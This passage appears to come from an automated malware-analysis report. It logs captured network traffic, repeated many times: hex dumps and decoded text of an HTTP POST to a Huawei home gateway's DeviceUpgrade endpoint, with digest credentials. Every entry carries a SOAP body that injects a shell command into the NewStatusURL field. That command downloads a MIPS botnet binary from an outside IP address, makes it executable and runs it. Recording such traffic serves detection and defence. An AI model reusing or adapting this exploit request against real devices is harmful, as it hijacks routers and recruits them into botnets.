20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 